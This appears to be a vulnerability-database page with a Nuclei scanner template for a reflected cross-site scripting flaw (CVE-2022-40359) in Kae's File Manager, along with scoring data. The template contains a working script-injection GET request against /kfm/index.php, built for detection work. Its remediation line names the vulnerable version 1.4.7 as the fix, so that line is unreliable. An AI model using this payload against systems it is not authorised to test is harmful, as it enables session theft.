Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-40359
HistoryOct 04, 2022 - 12:58 p.m.

Kae's File Manager <=1.4.7 - Cross-Site Scripting

2022-10-0412:58:20
ProjectDiscovery
github.com
2

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

40.9%

Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks
id: CVE-2022-40359

info:
  name: Kae's File Manager <=1.4.7 - Cross-Site Scripting
  author: edoardottt,daffainfo
  severity: medium
  description: |
    Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of Kae's File Manager plugin (1.4.7) or apply the vendor-provided patch to mitigate the XSS vulnerability.
  reference:
    - https://cxsecurity.com/issue/WLB-2022090057
    - https://code.google.com/archive/p/kfm/downloads
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40359
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-40359
    cwe-id: CWE-79
    epss-score: 0.00129
    epss-percentile: 0.46796
    cpe: cpe:2.3:a:kfm_project:kfm:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: kfm_project
    product: kfm
  tags: cve,cve2022,xss,kfm,kfm_project

http:
  - raw:
      - |
        GET /kfm/index.php/'<script>alert(document.domain);</script> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain);</script>"
          - "x_kfm_changeCaption"
          - "kfm_copyFiles"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220171d85e0f730e64868dee2a05909f6c686e599f48f3696442a181b69884cf50f022100c1f6c50e667cb2eb97f58eadec05e4db8a84fdda96907fa4c22f023609840b63:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

40.9%

Related for NUCLEI:CVE-2022-40359